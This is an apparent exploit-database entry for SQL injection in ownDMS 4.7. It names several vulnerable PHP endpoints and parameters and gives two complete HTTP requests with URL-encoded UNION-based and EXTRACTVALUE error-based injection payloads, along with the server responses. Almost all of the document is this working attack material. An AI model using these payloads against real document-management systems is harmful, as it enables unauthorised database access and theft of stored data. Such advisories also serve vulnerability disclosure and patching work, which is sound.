# Exploit Title: ownDMS 4.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.owndms.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/owndms/owndms_47.zip
# Version: 4.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/includes/pdfstream.php?IMG=[SQL]
# http://localhost/[PATH]/includes/imagestream.php?IMG=[SQL]
# http://localhost/[PATH]/includes/anyfilestream.php?IMG=[SQL]
#
GET /[PATH]/includes/pdfstream.php?IMG=%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35,0x48656c6c6f204861636b657220416269,%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2019 11:22:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Disposition: attachment; filename="Hello Hacker Abi"
Content-Length: 859
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/cashbook.php?showfordoc=[SQL]
#
GET /[PATH]/cashbook.php?showfordoc=%27%20AND%20%45%58%54%52%41%43%54%56%41%4c%55%45(%32%32,%43%4f%4e%43%41%54(0x5c,%76%65%72%73%69%6f%6e(),(%53%45%4c%45%43%54%20(%45%4c%54(%31%3d%31%2c%31))),%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2019 08:15:55 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Content-Length: 5150
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8